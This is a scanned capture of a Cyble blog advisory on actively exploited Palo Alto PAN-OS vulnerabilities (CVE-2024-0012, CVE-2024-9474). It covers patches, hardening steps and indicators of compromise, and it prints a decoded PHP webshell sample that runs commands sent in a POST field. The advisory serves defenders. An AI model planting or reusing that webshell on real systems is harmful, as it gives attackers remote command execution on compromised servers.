cyble.com Open in urlscan Pro
192.0.78.231  Public Scan

URL: https://cyble.com/blog/german-cert-warns-attacks-are-happening/
Submission: On November 29 via api from IN — Scanned from DE

Form analysis 3 forms found in the DOM

POST https://wordpress.com/email-subscriptions

<form action="https://wordpress.com/email-subscriptions" method="post" accept-charset="utf-8" data-blog="221651828" data-post_access_level="everybody" data-subscriber_email="" id="subscribe-blog" data-hs-cf-bound="true" data-cb-wrapper="true">
  <div class="wp-block-jetpack-subscriptions__form-elements">
    <p id="subscribe-email">
      <label id="subscribe-field-label" for="subscribe-field" class="screen-reader-text"> Type your email… </label>
      <input required="required" type="email" name="email" class="no-border-radius  has-ast-global-color-6-border-color" style="font-size: 16px;padding: 10px 15px 10px 15px;border-color: ast-global-color-6;border-radius: 0px;border-width: 1px;"
        placeholder="Type your email…" value="" id="subscribe-field" title="Please fill in this field.">
    </p>
    <p id="subscribe-submit" style="width: ;max-width: 100%;">
      <input type="hidden" name="action" value="subscribe">
      <input type="hidden" name="blog_id" value="221651828">
      <input type="hidden" name="source" value="https://cyble.com/blog/german-cert-warns-attacks-are-happening/">
      <input type="hidden" name="sub-type" value="subscribe-block">
      <input type="hidden" name="app_source" value="">
      <input type="hidden" name="redirect_fragment" value="subscribe-blog">
      <input type="hidden" name="lang" value="en_US">
      <input type="hidden" id="_wpnonce" name="_wpnonce" value="9eda257505"><input type="hidden" name="_wp_http_referer" value="/blog/german-cert-warns-attacks-are-happening/"><input type="hidden" name="post_id" value="72583"> <button type="submit"
        class="wp-block-button__link no-border-radius has-ast-global-color-6-border-color"
        style="background: #cc0000;width: 100%;font-size: 16px;padding: 10px 15px 10px 15px;margin: 0; margin-left: 10px;border-color: ast-global-color-6;border-radius: 0px;border-width: 1px;" name="jetpack_subscriptions_widget"> Subscribe Now <span
          class="jetpack-memberships-spinner"> <svg width="24" height="24" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg">
            <path d="M12,1A11,11,0,1,0,23,12,11,11,0,0,0,12,1Zm0,19a8,8,0,1,1,8-8A8,8,0,0,1,12,20Z" opacity=".25" fill="currentColor"></path>
            <path d="M10.14,1.16a11,11,0,0,0-9,8.92A1.59,1.59,0,0,0,2.46,12,1.52,1.52,0,0,0,4.11,10.7a8,8,0,0,1,6.66-6.61A1.42,1.42,0,0,0,12,2.69h0A1.57,1.57,0,0,0,10.14,1.16Z" class="jetpack-memberships-spinner-rotating" fill="currentColor"></path>
          </svg></span></button>
    </p>
  </div>
</form>

GET https://cyble.com/

<form class="search-form" action="https://cyble.com/" method="get" data-hs-cf-bound="true" data-cb-wrapper="true">
  <fieldset>
    <span class="text">
      <label for="search-field" class="screen-reader-text">Begin Search...</label>
      <input id="search-field" name="s" class="search-field" autocomplete="off" type="text" value="" placeholder="Begin Search..." tabindex="1">
    </span>
    <button aria-label="Search" id="search_submit" class="button search-submit" tabindex="2"><i class="astra-search-icon"> <span class="ast-icon icon-search"></span> </i></button>
  </fieldset>
</form>

POST https://wordpress.com/email-subscriptions

<form action="https://wordpress.com/email-subscriptions" method="post" accept-charset="utf-8" data-blog="221651828" data-post_access_level="everybody" data-subscriber_email="" id="subscribe-blog-2" data-hs-cf-bound="true" data-cb-wrapper="true">
  <div class="wp-block-jetpack-subscriptions__form-elements">
    <p id="subscribe-email">
      <label id="subscribe-field-2-label" for="subscribe-field-2" class="screen-reader-text"> Type your email… </label>
      <input required="required" type="email" name="email" style="font-size: 16px;padding: 15px 23px 15px 23px;border-radius: 50px;border-width: 1px;" placeholder="Type your email…" value="" id="subscribe-field-2" title="Please fill in this field.">
    </p>
    <p id="subscribe-submit">
      <input type="hidden" name="action" value="subscribe">
      <input type="hidden" name="blog_id" value="221651828">
      <input type="hidden" name="source" value="https://cyble.com/blog/german-cert-warns-attacks-are-happening/">
      <input type="hidden" name="sub-type" value="subscribe-block">
      <input type="hidden" name="app_source" value="atomic-subscription-modal-lo">
      <input type="hidden" name="redirect_fragment" value="subscribe-blog-2">
      <input type="hidden" name="lang" value="en_US">
      <input type="hidden" id="_wpnonce" name="_wpnonce" value="9eda257505"><input type="hidden" name="_wp_http_referer" value="/blog/german-cert-warns-attacks-are-happening/"><input type="hidden" name="post_id" value="72583"> <button type="submit"
        class="wp-block-button__link" style="font-size: 16px;padding: 15px 23px 15px 23px;margin: 0; margin-left: 10px;border-radius: 50px;border-width: 1px;" name="jetpack_subscriptions_widget"> Subscribe <span class="jetpack-memberships-spinner">
          <svg width="24" height="24" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg">
            <path d="M12,1A11,11,0,1,0,23,12,11,11,0,0,0,12,1Zm0,19a8,8,0,1,1,8-8A8,8,0,0,1,12,20Z" opacity=".25" fill="currentColor"></path>
            <path d="M10.14,1.16a11,11,0,0,0-9,8.92A1.59,1.59,0,0,0,2.46,12,1.52,1.52,0,0,0,4.11,10.7a8,8,0,0,1,6.66-6.61A1.42,1.42,0,0,0,12,2.69h0A1.57,1.57,0,0,0,10.14,1.16Z" class="jetpack-memberships-spinner-rotating" fill="currentColor"></path>
          </svg></span></button>
    </p>
  </div>
</form>

Text Content

Cyble Black Friday & Cyber Monday Deals: Get 3 Months Free on AmIBreached Annual
Subscription Copy Coupon Code | Redeem Now

Cyble Black Friday & Cyber Monday Deals: Get up to 66% off on Cyble’s Odin
Internet Scanning ASM Tool Redeem Now

×
Skip to content
 * New Report Highlights Critical Cybersecurity Challenges Facing the U.S.

Switch to Cyble

Report an Incident

Talk to Sales

We are Hiring!

Login
Login
 * ProductsMenu Toggle
   * For Enterprises(B2B) and GovernmentsMenu Toggle
     * AI-Driven Threat Intelligence Products
     * Cyble VisionFor Enterprises
       Award-winning cyber threat intelligence platform, designed to provide
       enhanced security through real-time intelligence and threat detection.
     * Cyble HawkFor Federal Bodies
       Protects sensitive information and assets from cyber threats with its
       specialized threat detection and intelligence capabilities built for
       federal bodies.
   * For Enterprises(B2B) and Individuals(B2C)Menu Toggle
     * AmIBreached
       Enables consumers and organizations to Identify, Prioritize and Mitigate
       darkweb risks.
     * Odin by CybleNew
       The most advanced internet-scanning tool in the industry for real-time
       threat detection and cybersecurity
     * The Cyber ExpressSubscribe
       #1 Trending Cyber Security News and Magazine
   * We’ve just released an update!
     Cyble has an update that enhances ASM, CTI and more...
     Menu Toggle
     * Schedule a Demo
 * SolutionsMenu Toggle
   * AI-Driven Cyber Threat Intelligence SolutionsPowered by AIMenu Toggle
     * Attack Surface Management
       Ensure digital security by identifying and mitigating threats with
       Cyble's Attack Surface Management
     * Brand Intelligence
       Comprehensive protection against online brand abuse, including brand
       impersonation, phishing, and fraudulent domains.
     * Cyber Threat Intelligence
       Gain insights and enhance your defense with AI-driven analysis and
       continuous threat monitoring
     * Dark Web Monitoring
       Stay vigilant and ahead of cybercriminals with Cyble's comprehensive Dark
       Web Monitoring.
     * Vulnerability Management
       
       Advanced scanning, risk evaluation, and efficient remediation strategies
       to protect against cyber threats.
     * Takedown and Disruption
       
       Fight cybercrime with Cyble’s top takedown services—remove fraud sites,
       content, and disrupt malicious campaigns.
   * Menu ItemMenu Toggle
     * Third Party Risk Management
       
       Identify and mitigate third-party risks to keep your business secure in
       external collaborations.
     * Digital Forensics & Incident Response
       
       Cyble offers comprehensive DFIR services to help businesses manage,
       mitigate, and recover from cyber incidents.
     * Physical Security Intelligence
       
       Monitor multiple locations on one platform with real-time alerts, AI
       insights, and tailored threat notifications for proactive security.
     * Executive Monitoring
       Protect your leadership with proactive threat detection, covering
       impersonations, PII leaks, and dark web monitoring with prompt alerts.
     * Cloud Security Posture Management (CSPM)
       Manage and secure cloud assets with Cyble’s CSPM, ensuring compliance and
       proactive risk detection across cloud and on-premises environments.
   * Solutions by Industry
     
     Menu Toggle
     * Healthcare & Pharmaceuticals
     * Financial Services
       
     * Retail and CPG
     * Technology Industry
     * Educational Platform
     * Solutions by Role
       
     * Information Security
     * Corporate Security
     * Marketing
       
 * Why Cyble?Menu Toggle
   * Compare CybleMenu Toggle
     * Industry RecognitionAwards
     * Customer Stories
 * ResourcesMenu Toggle
   * Thought LeadershipMenu Toggle
     * Blog
       Discover the latest in cybersecurity with Cyble's blog, featuring a
       wealth of articles, research findings, and insights. CRIL is an
       invaluable resource for anyone interested in the evolving world of cyber
       threats and defenses, offering expert analysis and updates.
     * Knowledge Hub
     * Threat Actor Profiles
     * SAMA Compliance
     * Events
       Conferences, Webinars, Training sessions and more…
   * Data SheetsMenu Toggle
     * Case Studies
       Dive into Cyble's case studies to discover real-world applications of
       their cybersecurity solutions. These studies provide valuable insights
       into how Cyble addresses various cyber threats and enhances digital
       security for different organizations.
     * Research Reports
        * Country Reports
        * Industry Reports
        * Ransomware Reports
     
     * WhitepapersDownload
     * External Threat Assessment ReportDownload Report
   * Research ReportsLatest Report
     
     Menu Toggle
     * Free Tools
        * Scan The Dark Web
        * Scan The Internet
 * CompanyMenu Toggle
   * Our Story
     Learn about Cyble's journey and mission in the cybersecurity landscape.
     Menu Toggle
     * Leadership Team
       Meet our leadership team.
     * CareersWe are hiring!
       Explore a career with Cyble and contribute to cutting-edge cybersecurity
       solutions. Check out Cyble's career opportunities.
     * Press
 * PartnersMenu Toggle
   * Cyble Partner Network (CPN)Join Us
     Join Cyble's Partner Network to collaborate and innovate in cybersecurity.
     This platform offers unique opportunities for partnerships, fostering
     growth and shared success in tackling cyber threats together.
     Menu Toggle
     * Partner Login
     * Become a PartnerRegister
       Elevate your cybersecurity business with the Cyble Partner Network:
       Access cutting-edge tools, expert support, and growth opportunities.
       Ideal for MSSPs, resellers, and alliances.


Free Trial
Free Trial
Main Menu
 * ProductsMenu Toggle
   * For Enterprises(B2B) and GovernmentsMenu Toggle
     * AI-Driven Threat Intelligence Products
     * Cyble VisionFor Enterprises
       Award-winning cyber threat intelligence platform, designed to provide
       enhanced security through real-time intelligence and threat detection.
     * Cyble HawkFor Federal Bodies
       Protects sensitive information and assets from cyber threats with its
       specialized threat detection and intelligence capabilities built for
       federal bodies.
   * For Enterprises(B2B) and Individuals(B2C)Menu Toggle
     * AmIBreached
       Enables consumers and organizations to Identify, Prioritize and Mitigate
       darkweb risks.
     * Odin by CybleNew
       The most advanced internet-scanning tool in the industry for real-time
       threat detection and cybersecurity
     * The Cyber ExpressSubscribe
       #1 Trending Cyber Security News and Magazine
   * We’ve just released an update!
     Cyble has an update that enhances ASM, CTI and more...
     Menu Toggle
     * Schedule a Demo
 * SolutionsMenu Toggle
   * AI-Driven Cyber Threat Intelligence SolutionsPowered by AIMenu Toggle
     * Attack Surface Management
       Ensure digital security by identifying and mitigating threats with
       Cyble's Attack Surface Management
     * Brand Intelligence
       Comprehensive protection against online brand abuse, including brand
       impersonation, phishing, and fraudulent domains.
     * Cyber Threat Intelligence
       Gain insights and enhance your defense with AI-driven analysis and
       continuous threat monitoring
     * Dark Web Monitoring
       Stay vigilant and ahead of cybercriminals with Cyble's comprehensive Dark
       Web Monitoring.
     * Vulnerability Management
       
       Advanced scanning, risk evaluation, and efficient remediation strategies
       to protect against cyber threats.
     * Takedown and Disruption
       
       Fight cybercrime with Cyble’s top takedown services—remove fraud sites,
       content, and disrupt malicious campaigns.
   * Menu ItemMenu Toggle
     * Third Party Risk Management
       
       Identify and mitigate third-party risks to keep your business secure in
       external collaborations.
     * Digital Forensics & Incident Response
       
       Cyble offers comprehensive DFIR services to help businesses manage,
       mitigate, and recover from cyber incidents.
     * Physical Security Intelligence
       
       Monitor multiple locations on one platform with real-time alerts, AI
       insights, and tailored threat notifications for proactive security.
     * Executive Monitoring
       Protect your leadership with proactive threat detection, covering
       impersonations, PII leaks, and dark web monitoring with prompt alerts.
     * Cloud Security Posture Management (CSPM)
       Manage and secure cloud assets with Cyble’s CSPM, ensuring compliance and
       proactive risk detection across cloud and on-premises environments.
   * Solutions by Industry
     
     Menu Toggle
     * Healthcare & Pharmaceuticals
     * Financial Services
       
     * Retail and CPG
     * Technology Industry
     * Educational Platform
     * Solutions by Role
       
     * Information Security
     * Corporate Security
     * Marketing
       
 * Why Cyble?Menu Toggle
   * Compare CybleMenu Toggle
     * Industry RecognitionAwards
     * Customer Stories
 * ResourcesMenu Toggle
   * Thought LeadershipMenu Toggle
     * Blog
       Discover the latest in cybersecurity with Cyble's blog, featuring a
       wealth of articles, research findings, and insights. CRIL is an
       invaluable resource for anyone interested in the evolving world of cyber
       threats and defenses, offering expert analysis and updates.
     * Knowledge Hub
     * Threat Actor Profiles
     * SAMA Compliance
     * Events
       Conferences, Webinars, Training sessions and more…
   * Data SheetsMenu Toggle
     * Case Studies
       Dive into Cyble's case studies to discover real-world applications of
       their cybersecurity solutions. These studies provide valuable insights
       into how Cyble addresses various cyber threats and enhances digital
       security for different organizations.
     * Research Reports
        * Country Reports
        * Industry Reports
        * Ransomware Reports
     
     * WhitepapersDownload
     * External Threat Assessment ReportDownload Report
   * Research ReportsLatest Report
     
     Menu Toggle
     * Free Tools
        * Scan The Dark Web
        * Scan The Internet
 * CompanyMenu Toggle
   * Our Story
     Learn about Cyble's journey and mission in the cybersecurity landscape.
     Menu Toggle
     * Leadership Team
       Meet our leadership team.
     * CareersWe are hiring!
       Explore a career with Cyble and contribute to cutting-edge cybersecurity
       solutions. Check out Cyble's career opportunities.
     * Press
 * PartnersMenu Toggle
   * Cyble Partner Network (CPN)Join Us
     Join Cyble's Partner Network to collaborate and innovate in cybersecurity.
     This platform offers unique opportunities for partnerships, fostering
     growth and shared success in tackling cyber threats together.
     Menu Toggle
     * Partner Login
     * Become a PartnerRegister
       Elevate your cybersecurity business with the Cyble Partner Network:
       Access cutting-edge tools, expert support, and growth opportunities.
       Ideal for MSSPs, resellers, and alliances.


TRENDING

TARGETED INDUSTRIES -> IT & ITES | Technology | Government & LEA | Healthcare |
BFSITARGETED COUNTRIES -> United States | Russian Federation | China | United
Kingdom | GermanyTARGETED REGIONS -> North America (NA) | Europe & UK | Asia &
Pacific (APAC) | Middle East & Africa (MEA) | Australia and New Zealand
(ANZ)IOCs -> a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91 |
7bdbd180c081fa63ca94f9c22c457376 |
c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0 |
8c69830a50fb85d8a794fa46643493b2 | bbcf7a68f4164a9f5f5cb2d9f30d9790CVEs ->
CVE-2024-21887 | CVE-2023-46805 | CVE-2017-11882 | CVE-2024-21893 |
CVE-2021-44228TECHNIQUES -> T1082 | T1140 | T1486 | T1083 | T1105TACTICS ->
TA505 | TA0011 | TA0002 | TA0001 | TA0005TAGS -> security | the-cyber-express |
firewall-daily | the-cyber-express-news | malwareTHREAT ACTORS -> Lockbit |
Blackcat | Lazarus | VoltTyphoon | KimsukyMALWARE -> CobaltStrike | Qakbot |
Xmrig | Icedid | TrickbotSOURCES -> Darkreading | The Cyber Express |
Bleepingcomputer | The Hacker News | Infosecurity Magazine

Home » Blog » German CERT Warns ‘Attacks are Happening,’ Urges PAN-OS Chained
Vulnerabilities’ Patching


 * Vulnerability

 * November 21, 2024


GERMAN CERT WARNS ‘ATTACKS ARE HAPPENING,’ URGES PAN-OS CHAINED VULNERABILITIES’
PATCHING

Scans show hundreds of Palo Alto management interfaces exposed to the internet,
carrying vulnerable versions of PAN-OS software.


OVERVIEW



The German CERT has raised the alarm bells for the exploitation of chained
vulnerabilities, urging users to patch them urgently as hundreds of vulnerable
instances remain exposed around the country and the globe.



CERT-Bund warned in a notification on X earlier this week: “Attacks are already
taking place. Customers should immediately secure their firewalls.” This warning
was for two critical vulnerabilities, CVE-2024-0012 and CVE-2024-9474, in Palo
Alto Networks’ PAN-OS.

Palo Alto confirmed that these bugs have been actively exploited in a limited
set of attacks, tracking under the banner “Operation Lunar Peek.” These
vulnerabilities allow attackers to gain unauthorized administrative privileges
and execute arbitrary commands, posing a significant risk to organizations using
affected devices.

While fixes have been released, the urgency of patching, monitoring, and
securing firewall management interfaces has never been higher. This blog
provides a detailed breakdown of the vulnerabilities, exploitation patterns, and
actionable remediation strategies to safeguard against this ongoing threat.

Technical Content! Subscribe to Unlock


Sign up and get access to Cyble Research and Intelligence Labs' exclusive
contents


Email
Country
Phone
Unlock this Content



UNDERSTANDING THE VULNERABILITIES




CVE-2024-0012: AUTHENTICATION BYPASS VULNERABILITY

 * Severity: Critical
 * Impact: Allows unauthenticated attackers with network access to the
   management web interface to:
   * Gain PAN-OS administrator privileges.
   * Tamper with configurations.
   * Exploit other privilege escalation vulnerabilities, such as CVE-2024-9474.
 * Affected Products:
   PAN-OS 10.2, 11.0, 11.1, and 11.2 software on PA-Series, VM-Series, CN-Series
   firewalls, Panorama appliances, and WildFire.
   Note: Cloud NGFW and Prisma Access are not affected.
 * Root Cause: Missing authentication checks for critical functions within the
   PAN-OS management web interface.


CVE-2024-9474: PRIVILEGE ESCALATION VULNERABILITY



 * Severity: Critical
 * Impact: Allows authenticated PAN-OS administrators to escalate privileges and
   execute arbitrary commands with root access.
 * Affected Products: Same as CVE-2024-0012, with additional fixes available for
   PAN-OS 10.1.

These vulnerabilities are particularly dangerous when chained together, enabling
unauthenticated remote command execution on vulnerable devices. Palo Alto said
that it assesses with moderate to high confidence that a functional exploit
chaining CVE-2024-0012 and CVE-2024-9474 is publicly available.


OBSERVED EXPLOITATION IN OPERATION LUNAR PEEK



Palo Alto Networks’ Unit 42 team is actively tracking exploitation activities
tied to these vulnerabilities. Key observations include:

Your browser does not support the video tag.
 * Initial Access: Exploitation has primarily targeted PAN-OS management web
   interfaces exposed to the internet. Many attacks originated from IP addresses
   associated with anonymous VPN services or proxies.
 * Post-Exploitation Activity:
   * Interactive command execution.
   * Deployment of webshells, such as a payload recovered with SHA256:
     3C5F9034C86CB1952AA5BB07B4F77CE7D8BB5CC9FE5C029A32C72ADC7E814668.
   * Potential lateral movement and further compromise of network assets.
 * Scanning Activity: Increased manual and automated scans, likely probing for
   vulnerable interfaces. A report by Censys found 13,324 publicly exposed
   management interfaces globally, with 34% located in the United States. More
   than 200 were located in Germany. German CERT has also confirmed active
   exploitation, urging organizations to “immediately secure their firewalls.”


REMEDIATION AND MITIGATION




PATCHING

Palo Alto Networks has released patches addressing both vulnerabilities.
Organizations must upgrade to the following versions immediately:

 * PAN-OS 10.2: 10.2.12-h2 or later.
 * PAN-OS 11.0: 11.0.6-h1 or later.
 * PAN-OS 11.1: 11.1.5-h1 or later.
 * PAN-OS 11.2: 11.2.4-h1 or later.
 * PAN-OS 10.1: 10.1.14-h6 (for CVE-2024-9474).


SECURING MANAGEMENT INTERFACES



Palo Alto Networks strongly recommends the following:

 1. Restrict Interface Access: Allow only trusted internal IP addresses or
    designated jump boxes to access the management interface.
 2. Disable Public Access: Block internet-facing access to the management
    interface via network-level controls.
 3. Enable Two-Factor Authentication (2FA): Add an extra layer of security for
    administrator access.


MONITORING AND DETECTION



 * Deploy detection rules for webshells and other malicious artifacts. The
   following decoded PHP webshell sample was observed during Operation Lunar
   Peek:

<?php $z=”system”;

if(${“_POST”}[“b”]==”iUqPd”)

{

    $z(${“_POST”}[“x”]);

};

 * Watch for abnormal activities such as:
   * Unrecognized configuration changes.
   * New or suspicious administrator accounts.
   * Command execution logs indicating unauthorized access.


ENHANCED FACTORY RESET (EFR)

Organizations detecting evidence of compromise should:

 1. Take affected devices offline immediately.
 2. Perform an Enhanced Factory Reset (EFR) in collaboration with Palo Alto
    Networks support.
 3. Reconfigure the device with updated firmware and secure management policies.


INDICATORS OF COMPROMISE (IOCS)




IP ADDRESSES OBSERVED IN SCANS AND EXPLOITS

 * Scanning Sources:
   * 41.215.28[.]241
   * 45.32.110[.]123
   * 103.112.106[.]17
   * 104.28.240[.]123
   * 182.78.17[.]137
   * 216.73.160[.]186

 * Threat Actor Proxies:
   * 91.208.197[.]167
   * 104.28.208[.]123 
   * 136.144.17[.]146
   * 136.144.17[.]149
   * 136.144.17[.]154
   * 136.144.17[.]158 
   * 136.144.17[.]161
   * 136.144.17[.]164
   * 136.144.17[.]166
   * 136.144.17[.]167
   * 136.144.17[.]170
   * 136.144.17[.]176
   * 136.144.17[.]177
   * 136.144.17[.]178
   * 136.144.17[.]180
   * 173.239.218[.]248 
   * 173.239.218[.]251
   * 209.200.246[.]173
   * 209.200.246[.]184
   * 216.73.162[.]69
   * 216.73.162[.]71
   * 216.73.162[.]73
   * 216.73.162[.]74
   *  


MALICIOUS ARTIFACTS



 * Webshell payload hash (PHP webshell payload dropped on a compromised firewall
   – SHA256): 3C5F9034C86CB1952AA5BB07B4F77CE7D8BB5CC9FE5C029A32C72ADC7E814668.


REFERENCES:



https://www.bsi.bund.de/SharedDocs/Cybersicherheitswarnungen/DE/2024/2024-291133-1032

https://www.bsi.bund.de/SharedDocs/Cybersicherheitswarnungen/DE/2024/2024-291133-1032.pdf?__blob=publicationFile&v=5

https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474


RELATED

CISA ADDS TWO CRITICAL PALO ALTO NETWORKS VULNERABILITIES TO KNOWN EXPLOITED
CATALOG

CISA adds CVE-2024-9463 and CVE-2024-9465 to its KEV catalog. These critical
Palo Alto Networks vulnerabilities in Expedition are being actively exploited.

November 18, 2024

In "Vulnerability"

CISA FINDS PALO ALTO NETWORKS’ CVE-2024-5910 EXPLOITED IN THE WILD

The flaw is a missing authentication vulnerability that allows an attacker with
network access to takeover Palo Alto Expedition’s admin account and potentially
access configuration secrets, credentials, and other data.

November 8, 2024

In "Cyber news"

CERT-IN ADVISORY AND WIKILOADER CAMPAIGN: COMPREHENSIVE OVERVIEW OF RECENT
SECURITY THREATS

CERT-In's advisory on Palo Alto Networks vulnerabilities and WikiLoader’s fake
GlobalProtect installers highlight major security risks.

September 3, 2024

In "Cyber news"






GET THREAT ASSESSMENT REPORT

Identify External Threats Targeting Your Business
Get My Report
Free
Your browser does not support the video tag.
 * 
 * 





CISO’S GUIDE TO THREAT INTELLIGENCE 2024: BEST PRACTICES

Stay Ahead of Cyber Threats with Expert Insights and Strategies. Download Free
E-Book Now

Search for your darkweb exposure



Use Cyble's Largest Dark Web Monitoring Engine to Assess Your Exposure. Make
Sure You're Aware of the Risks by Searching Through Our 150,447,938,145 Records!
We Have Over 50,000 Data Breaches, Several Hacking Forums, Conversations
Indexed.

Download Now


Cybercrime Magazine · AI's Impact On Cybersecurity. Microsoft Recall & Beyond.
Beenu Arora, Co-Founder & CEO, Cyble.

Business Email Address*

Type your email…

Subscribe Now

Share the Post:

PrevPreviousUSDA Implements Phishing-Resistant Multi-Factor Authentication (MFA)
with Fast Identity Online (FIDO)
NextCISA and EPA Reports Find Concerning Critical Infrastructure
VulnerabilitiesNext


RELATED POSTS

NEW REPORT HIGHLIGHTS CRITICAL CYBERSECURITY CHALLENGES FACING THE U.S.

November 29, 2024

COMBATTING COUNTERFEIT GOODS IN E-COMMERCE WITH CYBLE BRAND PROTECTION
STRATEGIES

November 29, 2024


QUICK LINKS

Main Menu

 * Home
 * About Us
 * Blog
 * Cyble Partner Network (CPN)
 * Press
 * Responsible Disclosure
 * Knowledge Hub
 * Sitemap

THREAT INTELLIGENCE PRODUCTS & PLATFORMS

Main Menu

 * AmIBreached
 * Cyble Vision
 * Cyble Hawk
 * Cyble Odin
 * The Cyber Express

SOLUTIONS

Main Menu

 * Attack Surface Management
 * Brand Intelligence
 * Threat Intelligence Platform
 * Dark Web Monitoring
 * Takedown and Disruption
 * Vulnerability Management
 * Third-Party Risk Management (TPRM)
 * Physical Threat Intelligence
 * Executive Monitoring
 * Cloud Security Posture Management (CSPM)

PRIVACY POLICY

Main Menu

 * AmIBreached
 * Cyble Vision
 * Cyble Trust Portal

SCHEDULE A PERSONALIZED DEMO TO UNCOVER THREATS THAT NO ONE TELLS YOU

Book a Demo
© 2024. Cyble Inc.(#1 Threat Intelligence Platform Company). All Rights Reserved

Made with from Cupertino

Twitter Linkedin Youtube
Request a demo
Upcoming Events
Research Reports
Talk To Sales



START TYPING AND PRESS ENTER TO SEARCH

Begin Search...

Scroll to Top


DISCOVER MORE FROM CYBLE

Subscribe now to keep reading and get access to the full archive.

Type your email…

Subscribe

Continue reading

We use cookies to ensure that we give you the best experience on our website. If
you continue to use this site we will assume that you are happy with it.Ok






Stay ahead in Cybersecurity with Cyble Research. You can unsubscribe at any
time.


AllowCancel


×
We Value Your Privacy
Settings
NextRoll, Inc. ("NextRoll") and our 20 advertising partners use cookies and
similar technologies on this site and use personal data (e.g., your IP address).
If you consent, the cookies, device identifiers, or other information can be
stored or accessed on your device for the purposes described below. You can
click "Allow All" or "Decline All" or click Settings above to customise your
consent regarding the purposes and features for which your personal data will be
processed and/or the partners with whom you will share personal data.
NextRoll and our advertising partners process personal data to: ● Store and/or
access information on a device; ● Create a personalised content profile; ●
Select personalised content; ● Personalised advertising, advertising
measurement, audience research and services development; ● Services development.
For some of the purposes above, our advertising partners: ● Use precise
geolocation data. Some of our partners rely on their legitimate business
interests to process personal data. View our advertising partners if you wish to
provide or deny consent for specific partners, review the purposes each partner
believes they have a legitimate interest for, and object to such processing.
If you select Decline All, you will still be able to view content on this site
and you will still receive advertising, but the advertising will not be tailored
for you. You may change your setting whenever you see the Manage consent
preferences on this site.
Decline All
Allow All
Manage consent preferences